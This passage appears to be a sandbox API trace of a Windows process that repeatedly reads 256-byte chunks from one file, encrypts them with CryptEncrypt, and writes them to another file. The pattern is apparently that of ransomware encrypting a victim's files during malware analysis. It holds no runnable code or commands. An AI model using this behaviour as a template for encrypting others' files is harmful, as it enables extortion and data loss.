lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.453] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.453] GetLastError () returned 0x0 [0167.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.453] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.453] GetLastError () returned 0x0 [0167.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.454] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.454] GetLastError () returned 0x0 [0167.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.455] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.455] GetLastError () returned 0x0 [0167.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.455] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.455] GetLastError () returned 0x0 [0167.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.455] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.455] GetLastError () returned 0x0 [0167.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.455] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.455] GetLastError () returned 0x0 [0167.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.455] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.455] GetLastError () returned 0x0 [0167.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.455] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.455] GetLastError () returned 0x0 [0167.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.456] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.456] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.457] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.457] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.457] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.457] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.457] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.457] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.457] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.457] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.457] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.457] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.457] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.457] GetLastError () returned 0x0 [0167.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.458] GetLastError () returned 0x0 [0167.458] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.458] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.458] GetLastError () returned 0x0 [0167.458] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.458] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.458] GetLastError () returned 0x0 [0167.458] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.458] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.458] GetLastError () returned 0x0 [0167.458] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 